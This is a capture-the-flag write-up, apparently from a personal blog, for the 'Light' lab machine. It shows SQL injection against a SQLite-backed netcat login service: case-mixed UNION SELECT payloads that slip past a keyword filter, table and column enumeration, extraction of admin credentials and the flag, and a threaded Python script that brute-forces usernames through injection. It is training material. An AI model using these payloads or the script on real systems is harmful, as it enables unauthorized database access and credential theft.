HackTheBox: Account

Contact: [email protected]

Follow me on: X

Check My: Github

Back to home
Light

Light

Last modified: 2025-03-26 19:29:39

Machine Name OS IP Address Difficulty
Light Linux 10.10.89.204 Easy

What is the admin username?


A service is running on port 1337, and we can interact with it using:

nc 10.10.144.115 1337

After providing various inputs, the following responses indicate different behaviors:

└─# nc 10.10.144.115 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: test
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"

The error triggered by a single quote (') suggests a SQL injection vulnerability.

We aim to identify the underlying database management system (DBMS). Based on the room’s name, Light, it is likely running SQLite.

However, certain characters and keywords are restricted:

Please enter your username: --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: UNION
Ahh there is a word in there I don't like :(
Please enter your username: SELECT
Ahh there is a word in there I don't like :(

Despite this, we can bypass the filter using a mix of lowercase and uppercase characters. Using this technique, we can identify the SQLite version:

Please enter your username:' UnIoN SeLect sqlite_version() '
Password: 3.31.1

Next, we enumerate the table names:

Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM sqlite_master WHERE type='table
Password: usertable,admintable

| Note: group_concat is used here to return results as a single column, which is required by the output format.

To enumerate the columns of the admintable:

Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM pragma_table_info('admintable') '
Password: id,username,password

Now we extract all usernames from the admintable:

Please enter your username:' UnIoN SeLect group_concat(username, ',') FROM admintable '
Password: TryHackMeAdmin,flag

✅ The admin username is: TryHackMeAdmin

What is the password to the username mentioned in question 1?


To extract the admin password:

Please enter your username:' UnIoN SeLect password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17

✅ The admin password is: mamZtAuMlrsEy5bp6q17

What is the flag?


We retrieve the value for the flag user:

Please enter your username:' UnIoN SeLect password FROM admintable WHERE username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Enumerating Users via Blind SQL Injection


The following Python script performs brute-force enumeration of usernames based on prefix matching in the current context:

import socket
import string
import threading

def bruteforce_username(target_ip, target_port, prefix=""):
    alphabet = string.ascii_lowercase

    for char in alphabet:
        attempt = f"{prefix}{char}%"

        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((target_ip, target_port))

            s.recv(1024)  # Welcome message
            response = s.recv(1024).decode('utf-8')  # Prompt for username
            s.sendall((f"' or username like '{attempt}\n").encode('utf-8'))
            response = s.recv(1024).decode('utf-8')

        if "Password:" in response:
            print(f"[+] Valid username prefix: {prefix}{char}")
            threading.Thread(target=bruteforce_username, args=(target_ip, target_port, prefix + char)).start()

        elif "Username not found." in response:
            continue

target_ip = "10.10.144.115"
target_port = 1337

bruteforce_username(target_ip, target_port)

⚠️ This approach is significantly slower and should be used as a last resort for blind enumeration.

Table of Contents